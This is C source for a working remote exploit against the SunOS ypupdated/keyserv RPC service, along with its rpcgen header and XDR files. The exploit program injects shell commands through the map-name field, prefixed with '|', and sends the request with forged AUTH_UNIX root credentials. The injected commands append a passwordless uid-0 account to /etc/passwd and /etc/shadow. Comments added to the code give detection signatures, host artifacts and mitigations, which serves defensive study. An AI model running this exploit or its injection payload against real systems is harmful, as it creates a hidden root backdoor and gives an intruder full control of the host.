ypk.c:
/*update: kcope/year2008/tested on SunOS 5.10//
KEYSERV/YPUPDATED (SunOS 4.1.3/RPC SERVICES)
If we send a MAP UPDATE to a remote YPUPDATED (via KEYSERV), it executes a shell through which extra commands may be launched on the remote host by passing '|shell command' as the map name.
I.e. the comm variable contains a pipe character after which a
command may be passed. You may change the command by changing this.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <rpc/rpc.h>
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255
/*
 * Local copies of the types from ypupdate_prot.h (ypk.c does not include
 * that header, so the two definitions must be kept in step by hand).
 */
/* Counted byte buffer: yp_buf_len bytes starting at yp_buf_val. */
typedef struct{
unsigned int yp_buf_len;
char * yp_buf_val;
} yp_buf;
/* Argument record serialized by xdr_ypupdate_args(). */
struct ypupdate_args{
char * mapname; /* NUL-terminated map name; sent as an XDR string */
yp_buf key; /* entry key */
yp_buf datum; /* entry value */
};
typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#else
bool_t xdr_ypupdate_args();
#endif
/*
 * Sends one ONC RPC request over UDP to program 100028, version 1,
 * procedure 1 on the host named in argv[1]. ypupdate_prot.h on this page
 * names those numbers YPU_PROG, YPU_VERS and YPU_CHANGE. The request is a
 * ypupdate_args record whose mapname field holds the string in `comm`.
 *
 * Root cause, per the file header: the service hands the map name to a
 * shell, so a name starting with '|' is run as a command. The XDR layer only
 * caps the name at MAXMAPNAMELEN bytes; it places no restriction on which
 * characters appear, so any filtering has to happen in the service itself.
 *
 * Defender notes:
 *  - A call to program 100028 whose map name contains '|' or ';' is not a
 *    legitimate map update and is a usable detection signature.
 *  - The embedded command appends an account line with uid 0 and an empty
 *    password field to /etc/passwd and /etc/shadow, so an unexpected uid-0
 *    entry in those files is the host-side artifact to look for.
 *  - Exposure is removed by not running the ypupdated service where map
 *    updates over RPC are not required, and by filtering the portmapper and
 *    RPC ports from untrusted networks; vendor fixes should be applied where
 *    the service must stay enabled.
 *
 * NOTE(review): `void main` with K&R-style parameters is non-standard, and
 * the client handle and auth handle are never destroyed before exit.
 */
void main(argc, argv)
int argc;
char *argv[];
{
CLIENT * cli;
/* RPC program and version numbers; same values as YPU_PROG / YPU_VERS. */
unsigned long prog=100028;
unsigned int vers=1;
struct sockaddr_in skn;
struct timeval timeVal;
struct hostent * hostEnt;
ypupdate_args ypArg;
unsigned long rtnval;
unsigned int desc;
/* Value placed in the map-name field: a '|' followed by shell command text. */
char * comm = "|echo \"r00t::0:0:Super-User die zweite:/:/sbin/sh\" >>
/etc/passwd;echo \"r00t::6445::::::\" >> /etc/shadow;";
/* The only argument is the target host name. */
if(argc<2) {
printf("example: yxp target\n");
exit(1);
}
/* 15 s, used both as the UDP retry interval and as the total call timeout. */
timeVal.tv_usec=0;
timeVal.tv_sec=15;
/* RPC_ANYSOCK asks the RPC library to open the socket itself.
 * NOTE(review): desc is unsigned int, while clntudp_create takes an int *. */
desc=RPC_ANYSOCK;
/* key and datum are one-character placeholders; the length counts the NUL. */
ypArg.datum.yp_buf_val="x";
ypArg.datum.yp_buf_len=strlen(ypArg.datum.yp_buf_val)+1;
ypArg.key.yp_buf_val="x";
ypArg.key.yp_buf_len=strlen(ypArg.key.yp_buf_val)+1;
ypArg.mapname=comm;
if ((hostEnt=gethostbyname(argv[1]))==NULL){
printf("gethostbyname failure\n");
exit(1);
}
/* Port 0 makes clntudp_create ask the remote portmapper for the program's
 * port, so the lookup for 100028 is itself visible on the wire.
 * NOTE(review): skn is not zeroed first, and the copy below assumes a
 * 4-byte IPv4 address instead of using hostEnt->h_length. */
skn.sin_family=AF_INET;skn.sin_port=htons(0);
bcopy(hostEnt->h_addr,&skn.sin_addr.s_addr,4);
if ((cli=clntudp_create(&skn,prog,vers,timeVal,&desc))==NULL){
printf("clntudp_create failure\n");
exit(1);
}
/* AUTH_UNIX credential claiming machine "localhost", uid 0, gid 0 and no
 * supplementary groups. These fields are asserted by the caller and carry no
 * proof, so a service cannot rely on them for authorization. */
cli->cl_auth=authunix_create("localhost",0,0,0,0);
/* Procedure 1 (YPU_CHANGE). The clnt_call status is discarded, so nothing is
 * reported about the outcome.
 * NOTE(review): rtnval is unsigned long but is decoded with xdr_u_int, which
 * writes only an unsigned int; the two sizes differ on LP64 platforms. */
clnt_call(cli,1,xdr_ypupdate_args,&ypArg,xdr_u_int,&rtnval,timeVal);
}
ypupdate_prot.h:
/*
* Please do not edit this file.
* It was generated using rpcgen.
*/
#ifndef _YPUPDATE_PROT_H_RPCGEN
#define _YPUPDATE_PROT_H_RPCGEN
#include <rpc/rpc.h>
/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
/*
* Compiled from ypupdate_prot.x using rpcgen
* This is NOT source code!
* DO NOT EDIT THIS FILE!
*/
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255
/*
 * Counted byte buffer. xdr_yp_buf() encodes it with xdr_bytes(), capped at
 * MAXYPDATALEN bytes.
 */
typedef struct {
u_int yp_buf_len; /* number of bytes at yp_buf_val */
char *yp_buf_val; /* buffer contents */
} yp_buf;
#ifdef __cplusplus
extern "C" bool_t xdr_yp_buf(XDR *, yp_buf*);
#elif __STDC__
extern bool_t xdr_yp_buf(XDR *, yp_buf*);
#else /* Old Style C */
bool_t xdr_yp_buf();
#endif /* Old Style C */
/*
 * Argument record for the procedures declared in this header that take a
 * ypupdate_args * (ypu_change_1, ypu_insert_1, ypu_store_1).
 * xdr_ypupdate_args() caps mapname at MAXMAPNAMELEN bytes; that is a length
 * limit only, so a service consuming the name must validate its characters
 * itself before using it in a path or command line.
 */
struct ypupdate_args {
char *mapname; /* NUL-terminated map name */
yp_buf key; /* entry key */
yp_buf datum; /* entry value */
};
typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *, ypupdate_args*);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *, ypupdate_args*);
#else /* Old Style C */
bool_t xdr_ypupdate_args();
#endif /* Old Style C */
/*
 * Argument record for ypu_delete_1. mapname is serialized by
 * xdr_ypdelete_args() with the same MAXMAPNAMELEN length cap and, as with
 * ypupdate_args, no restriction on its characters.
 */
struct ypdelete_args {
char *mapname; /* NUL-terminated map name */
yp_buf key; /* key of the entry to delete */
};
typedef struct ypdelete_args ypdelete_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypdelete_args(XDR *, ypdelete_args*);
#elif __STDC__
extern bool_t xdr_ypdelete_args(XDR *, ypdelete_args*);
#else /* Old Style C */
bool_t xdr_ypdelete_args();
#endif /* Old Style C */
#define YPU_PROG ((u_long)100028)
#define YPU_VERS ((u_long)1)
#ifdef __cplusplus
#define YPU_CHANGE ((u_long)1)
extern "C" u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern "C" u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern "C" u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern "C" u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern "C" u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);
#elif __STDC__
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);
#else /* Old Style C */
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1();
extern u_int * ypu_change_1_svc();
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1();
extern u_int * ypu_insert_1_svc();
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1();
extern u_int * ypu_delete_1_svc();
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1();
extern u_int * ypu_store_1_svc();
#endif /* Old Style C */
#endif /* !_YPUPDATE_PROT_H_RPCGEN */
ypupdate_prot_xdr.c:
/*
* Please do not edit this file.
* It was generated using rpcgen.
*/
#include "ypupdate_prot.h"
/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
/*
* Compiled from ypupdate_prot.x using rpcgen
* This is NOT source code!
* DO NOT EDIT THIS FILE!
*/
/*
 * XDR filter for yp_buf: a counted byte string of at most MAXYPDATALEN
 * bytes. Returns TRUE when xdr_bytes() succeeds and FALSE otherwise.
 */
bool_t
xdr_yp_buf(XDR *xdrs, yp_buf *objp)
{
	char **valp = (char **)&objp->yp_buf_val;
	u_int *lenp = (u_int *)&objp->yp_buf_len;

	return (xdr_bytes(xdrs, valp, lenp, MAXYPDATALEN) ? TRUE : FALSE);
}
/*
 * XDR filter for ypupdate_args. The fields are processed in declaration
 * order (mapname, key, datum) and processing stops at the first failure.
 *
 * MAXMAPNAMELEN bounds only the length of mapname; this filter does not
 * inspect its characters, so a consumer must validate the name before using
 * it in a file path or command line.
 */
bool_t
xdr_ypupdate_args(XDR *xdrs, ypupdate_args *objp)
{
	if (xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN) &&
	    xdr_yp_buf(xdrs, &objp->key) &&
	    xdr_yp_buf(xdrs, &objp->datum)) {
		return (TRUE);
	}
	return (FALSE);
}
/*
 * XDR filter for ypdelete_args: mapname (at most MAXMAPNAMELEN bytes), then
 * key. Stops at the first failing field. As with xdr_ypupdate_args(), only
 * the length of mapname is bounded here, not its content.
 */
bool_t
xdr_ypdelete_args(XDR *xdrs, ypdelete_args *objp)
{
	if (xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN) &&
	    xdr_yp_buf(xdrs, &objp->key)) {
		return (TRUE);
	}
	return (FALSE);
}